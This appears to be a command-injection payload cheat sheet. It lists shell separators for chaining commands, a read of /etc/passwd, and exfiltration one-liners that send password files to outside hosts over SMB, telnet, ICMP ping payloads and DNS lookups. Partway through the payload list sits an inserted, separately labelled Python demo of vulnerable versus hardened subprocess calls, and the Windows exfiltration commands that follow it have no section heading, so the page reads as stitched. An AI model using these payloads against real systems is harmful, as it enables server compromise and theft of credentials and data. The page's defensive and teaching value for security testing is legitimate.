OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.
Resources
How to inject
Basic commands
cat /etc/passwd
Chaining commands
original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
original_cmd_by_server || ls   # only runs if the first command fails
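Added example (not code from this page): the `;` separator from the chaining list above reaching `/bin/sh` through string concatenation, next to the argv-list, quoted and allow-list forms that stop it. The `echo` stand-in for the server's real command and the `INJECTED` input are constructed so the demo is harmless to run.

```python
"""Constructed demo: a server-side wrapper that runs an OS command with user
input, first in the injectable form and then hardened. 'echo' stands in for
the server's real command so running it has no side effects."""
import re
import shlex
import subprocess
from typing import List

# Constructed input using the ';' chaining separator; the chained command
# is only another 'echo', so nothing harmful executes.
INJECTED = "hello; echo INJECTED"

# Allow-list for the one value that legitimately belongs on the command line
# (a hostname or IPv4 literal): letters, digits, dots and hyphens only.
_HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def _run(cmd, shell: bool) -> List[str]:
    res = subprocess.run(cmd, shell=shell, capture_output=True, text=True, check=False)
    return res.stdout.splitlines()


def vulnerable_echo(user_input: str) -> List[str]:
    """String concatenation + shell=True: /bin/sh interprets every metacharacter,
    so ';' terminates 'echo' and starts a second, attacker-chosen command."""
    return _run("echo " + user_input, shell=True)


def hardened_echo(user_input: str) -> List[str]:
    """argv list, no shell: the whole input is one literal argument of echo."""
    return _run(["echo", user_input], shell=False)


def quoted_shell_echo(user_input: str) -> List[str]:
    """When a shell cannot be avoided, shlex.quote() turns the input into a single
    word; this is defence in depth, the argv form above is still preferred."""
    return _run("echo " + shlex.quote(user_input), shell=True)


def is_valid_host(value: str) -> bool:
    """Allow-list check to apply before a value ever reaches a command line."""
    return _HOST_RE.fullmatch(value) is not None


if __name__ == "__main__":
    print("vulnerable:", vulnerable_echo(INJECTED))    # ['hello', 'INJECTED']
    print("hardened:  ", hardened_echo(INJECTED))      # ['hello; echo INJECTED']
    print("quoted:    ", quoted_shell_echo(INJECTED))  # ['hello; echo INJECTED']
    for candidate in ("10.0.0.5", "10.0.0.5 && ls", "a|b"):
        print(candidate, "->", is_valid_host(candidate))
```

The allow-list is the real fix: rejecting `;`, `&&`, `|` and `||` at input time keeps the chaining shown above from reaching any shell, whichever invocation style the server uses.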
#on Windows
net use h: \\<ip>\web /user: {password} && copy {File to Copy} h:\(unknown).txt
Using telnet
telnet <ip> {port} < {file to transfer}
Using ICMP
#on Linux
cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done
#In Wireshark we can observe the packets containing our data. You could write a script which scrapes the packets and re-assembles the file on the host
Using DNS
cat /data/secret/password.txt | xxd -p -c 16 | while read exfil; do host $exfil.contextis.com 192.168.107.135; done
#In Wireshark we can observe the packets containing our data. You could write a script which scrapes the packets and re-assembles the file on the host